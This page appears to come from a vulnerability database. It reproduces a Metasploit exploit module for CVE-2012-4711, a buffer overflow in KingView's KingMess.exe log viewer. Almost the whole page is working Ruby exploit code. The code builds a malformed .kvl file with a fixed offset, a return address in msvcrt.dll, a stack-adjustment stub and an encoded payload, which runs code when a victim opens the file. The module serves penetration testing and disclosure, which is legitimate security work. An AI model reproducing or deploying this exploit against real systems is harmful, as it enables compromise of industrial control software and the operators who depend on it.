KingView Log File Parsing Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

KingView Log File Parsing Buffer Overflow vulnerability in KingView 6.55 application via a malformed .kvl fil


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      &#39;Name&#39;           =&#62; &#34;KingView Log File Parsing Buffer Overflow&#34;,
      &#39;Description&#39;    =&#62; %q{
          This module exploits a vulnerability found in KingView &#60;= 6.55. It exists in
        the KingMess.exe application when handling log files, due to the insecure usage of
        sprintf. This module uses a malformed .kvl file which must be opened by the victim
        via the KingMess.exe application, through the &#39;Browse Log Files&#39; option. The module
        has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over
        Windows XP SP3.
      },
      &#39;License&#39;        =&#62; MSF_LICENSE,
      &#39;Author&#39;         =&#62;
        [
          &#39;Lucas Apa&#39;, # Vulnerability discovery
          &#39;Carlos Mario Penagos Hollman&#39;, # Vulnerability discovery
          &#39;juan vazquez&#39; # Metasploit module
        ],
      &#39;References&#39;     =&#62;
        [
          [&#39;CVE&#39;, &#39;2012-4711&#39;],
          [&#39;OSVDB&#39;, &#39;89690&#39;],
          [&#39;BID&#39;, &#39;57909&#39;],
          [&#39;URL&#39;, &#39;http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf&#39;]
        ],
      &#39;Payload&#39;        =&#62;
        {
          &#39;Space&#39;          =&#62; 1408,
          &#39;DisableNops&#39;    =&#62; true,
          &#39;BadChars&#39;       =&#62; &#34;\x00\x0a\x0d&#34;,
          &#39;PrependEncoder&#39; =&#62; &#34;\x81\xc4\x54\xf2\xff\xff&#34; # Stack adjustment # add esp, -3500
        },
      &#39;DefaultOptions&#39; =&#62;
        {
          &#39;EXITFUNC&#39; =&#62; &#39;process&#39;
        },
      &#39;Platform&#39;       =&#62; &#39;win&#39;,
      &#39;Targets&#39;        =&#62;
        [
          [ &#39;KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3&#39;,
            {
              &#39;Offset&#39; =&#62; 295,
              &#39;Ret&#39;    =&#62; 0x77c35459 # push esp # ret # msvcrt.dll
            }
          ]
        ],
      &#39;Privileged&#39;     =&#62; false,
      &#39;DisclosureDate&#39; =&#62; &#34;Nov 20 2012&#34;,
      &#39;DefaultTarget&#39;  =&#62; 0))

    register_options(
      [
        OptString.new(&#39;FILENAME&#39;, [true, &#39;The filename&#39;, &#39;msf.kvl&#39;])
      ], self.class)
  end

  def exploit
    version = &#34;6.00&#34;
    version &#60;&#60; &#34;\x00&#34; * (0x90 - version.length)
    entry = &#34;\xdd\x07\x03\x00\x03\x00\x0d\x00\x0c\x00\x31\x00\x38\x00\xd4\x01&#34;
    entry &#60;&#60; rand_text_alpha(target[&#39;Offset&#39;])
    entry &#60;&#60; [target.ret].pack(&#34;V&#34;)
    entry &#60;&#60; rand_text_alpha(16)
    entry &#60;&#60; payload.encoded

    kvl_file = version
    kvl_file &#60;&#60; entry

    file_create(kvl_file)
  end
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1